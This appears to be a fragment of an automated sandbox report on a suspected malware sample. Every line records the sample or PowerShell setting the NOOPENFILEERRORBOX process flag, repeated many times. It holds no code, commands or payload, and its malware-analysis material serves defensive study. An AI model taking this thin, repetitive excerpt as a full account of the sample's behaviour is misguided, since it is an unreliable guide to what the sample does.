Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
